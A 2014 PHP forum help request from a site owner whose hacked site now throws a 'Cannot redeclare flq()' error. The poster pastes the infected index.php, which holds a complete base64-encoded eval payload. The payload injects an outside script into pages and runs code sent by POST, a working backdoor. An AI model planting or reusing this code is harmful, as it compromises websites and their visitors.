Somebody hacked into my site and changed coding >>> URGENT HELP NEEDED <<<

Posted on 16th Feb 2014 07:03 pm by admin

I am not that much into programming , but somebody is hacking to my site and injecting some kind of iframes ... it happened to another site , but that wasn't that important for me, but now it has happened to one of my major site not sure what is going on. Need some immediate help

I see this code

QuoteFatal error: Cannot redeclare flq() (previously declared in /home/articles/public_html/lib/functions.compat.php(1) : eval()'d code:1) in /home/articles/public_html/lib/functions.date.php(1) : eval()'d code on line 1

This is the infected index home page file now

Quote<?php eval(base64_decode('aWYoIWlzc2V0KCRmbHExKSl7ZnVuY3Rpb24gZmxxKCRzKXtpZ ihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkZuWVdjME5DNWpiMjB2ZG1JdllYSmtiaTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLCcsYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIGZscTIoJGEsJGIsJGMsJGQpe2dsb2JhbCAkZmxxMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkZmxxMSkpY2FsbF91c2VyX2Z1bmMoJGZscTEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSkgYXMgJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nZmxxJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2ZscScpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRmbHFsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdmbHEyJykpIT0nZmxxMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?><?php

include("init.php");
$GLOBALS["AL_CLASS_INDEX"] = &GetClass('index');
$GLOBALS["AL_CLASS_INDEX"]->HandlePage();

?>

This was the original index

Quote<?php

include("init.php");
$GLOBALS["AL_CLASS_INDEX"] = &GetClass('index');
$GLOBALS["AL_CLASS_INDEX"]->HandlePage();

?>

when I try to replace it agin gives some error it happened a day before , when I replace the index from backup it worked , but today its not working, need some help immediatly .. thanks

No comments posted yet

Your Answer:

Login to answer
151 Like 12 Dislike
Previous forums Next forums
Other forums

mysql VARCHAR acting like INT
Hi, All.

I have a table that contains a varchar(10) column named weird_field. In this column

Storing user data help?
Hey Guys,

I'm not use if this question is to broad but I can always give you more informatio

Help pulling in 'id' with "read more" link
I'm trying to create snippets of my articles in the cms I'm creating, and then have them redirect to

Form File Upload
I've read through tons of resources and tutorials and as far as I can tell, my code is accurate, but

Call Screen statement Error
Dear Experts,

is there any setting that needs to be done before creating any dialog progr

Need help with simple code, back and forward buttons.
Basically, I have a set of pages in a folder, which have the title somephrasehere_09.php, somephrase

strptime() equivalent for php4 ?!
Greetings!

this is my first post, thank you in advance for your replies.

Well, the ti

Mail from PHP form not always ending up in my inbox?
Hi guys,

I'm a real newbie to PHP and have managed to put together a simple mail form that se

My query is being run with no results.
I have this.

Code: function DropUser($duser_id, $user_email, $user_username) {

On page view, minus credit
Hello all, please, I need a little help with this script. I am charging one credit (credits can be p

Login   |   Register
Follow Us
Indyaspeak @ Facebook Indyaspeak @ Twitter Indyaspeak @ Pinterest RSS

Play Free Quiz and Win Cash